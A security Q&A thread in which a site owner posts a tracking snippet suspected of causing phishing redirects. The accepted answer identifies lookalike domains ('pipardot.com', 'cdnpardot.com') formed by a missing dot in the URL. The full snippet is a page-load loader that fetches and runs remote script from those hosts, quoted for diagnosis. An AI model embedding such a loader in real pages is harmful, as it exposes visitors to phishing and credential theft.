# Tracking script creates vulnerability

Tags: web-application, webserver, clickjacking

I am using a third party service that provided a tracking script which when embedded in the page seems to create some kind of vulnerability as occasionally people are redirected to a phising link instead. Big flashy text pretend microsoft login that kind of thing.

This is the script:

```
<script type="text/javascript">
piAId = '<redacted>';
piCId = '<redacted>';
piHostname = 'pi.pardot.com';

(function() {
            function async_load(){
                            var s = document.createElement('script'); s.type = 'text/javascript';
                            s.src = ('https:' == document.location.protocol ? 'https://pi' : 'http://cdn') + 'pardot.com/pd.js';
                            var c = document.getElementsByTagName('script')[0]; c.parentNode.insertBefore(s, c);
            }
            if(window.attachEvent) { window.attachEvent('onload', async_load); }
            else { window.addEventListener('load', async_load, false); }
})();
</script>
```

Is the issue with the script itself or the hosting configuration allowing this to be manipulated?

Answer (score 0, accepted):

There is something funky about this script.

```
('https:' == document.location.protocol ? 'https://pi' : 'http://cdn') + 'pardot.com/pd.js'
```

This expression produces the urls `pipardot.com` and `cdnpardot.com` which appear to be registered to *not* pardot.com. The script is bad, and wherever you got the script from is also bad.

It may also have been good from the original source, but edited by another exploit on your web server.

Comment: Thanks, I'll find out where this script came from exactly. Glad to see the script is the culprit.